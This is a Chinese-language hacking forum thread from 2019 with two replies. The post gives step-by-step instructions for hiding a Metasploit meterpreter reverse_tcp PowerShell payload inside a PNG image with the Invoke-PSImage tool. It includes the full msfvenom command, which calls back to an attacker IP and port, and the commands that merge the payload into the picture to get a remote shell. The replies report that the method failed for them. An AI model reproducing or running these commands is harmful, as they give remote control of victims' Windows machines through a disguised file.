利用照片反弹shell

小黄人 · 发表于 2019-7-3 15:58:41

利用工具：

https://github.com/peewpw/Invoke-PSImage

一、首先利用msf创建一个ps1脚本

代码：

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.124.11 LPORT=6666 -f psh-reflection -o /root/bbs.ps1
QQ截图20190703155406.png

然后，我们在找一张图片

（猜猜她是谁？）

将生成的bbs.ps1和图片放在Invoke-PSImage目录下，方便执行命令的时候找文件
QQ截图20190703155622.png

首先要执行“Import-Module .\Invoke-PSImage.ps1”命令。再执行“Invoke-PSImage -Script .\bbs.ps1 -Image .\bj.png -Out .\boduo.png“命令进行两者合并。

然后我们到msf配置，运行图片即可得到shell

Richard · 发表于 2019-7-6 14:19:12

你写的这个，我在之前的一个公众号中也看到过。但是复现失败了，貌似好多人都提到这个问题，按照稳重流程，试了好多遍，都没有反弹成功，不知道自己是哪块出问题，楼主可以将自己的复现过程截图，详细的发一遍嘛

bystart · 发表于 2020-7-27 10:56:43

反弹有问题无法建立shell